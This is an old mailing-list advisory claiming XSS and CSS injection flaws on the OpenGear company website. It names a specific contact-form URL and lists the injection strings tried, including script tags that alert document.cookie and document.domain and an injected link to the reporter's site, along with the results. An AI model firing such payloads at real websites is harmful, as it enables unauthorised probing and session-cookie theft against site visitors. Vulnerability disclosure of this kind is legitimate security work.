<<< Date Index >>>     <<< Thread Index >>>

XSS Bug in OpenGear Server Website



0x0*] Advisory 
==============

Web Penetrated By:- Aditya@xxxxxxxxxxx
=======================================
Hit                     :- Site Manipulation.
====
Vulnerability   :- XSS Injection && CSS Injection OpenGear WebSite
==============
BrowserStatus   :- Windows IE 6.0
==============

Injections      :-
==========         0x01] ' && ""
                   0x02] <script>Javascript:alert("Penetrated");</script>
                   0x03] <p>Penetrated</p>
                   0x04] <a href ="www.zeroknock.cjb.net">ZeroKnock</a>
                   0x05] '';!--"<CSS_Check>=&{()}
                   0x06] '<script>javascript:alert(document.cookie);</script>
                   0x07]  '<script>javascript:alert(document.domain);</script>
                          

                                Result:-Opengear.com with alert injection.
                        
                   0x01] document.domain Injection Yields --> Opengear.com
                   0x02] document.cookie Injection Yields --> Empty string
                   0x03] Remote Linking Is Possible <a href=""></a> Working.
                   0x04] The OutBound Attack Is Also Definitive.

Site            :- http://www.Opengear.com
=======    
Vulnerable Link:
================    http://www.opengear.com/cm4000_nwcontact.html


Explanation     :- 
=============
                
[+] Poorly Coded Modules.
[+] No Patch For Ignorance.

                =========================================================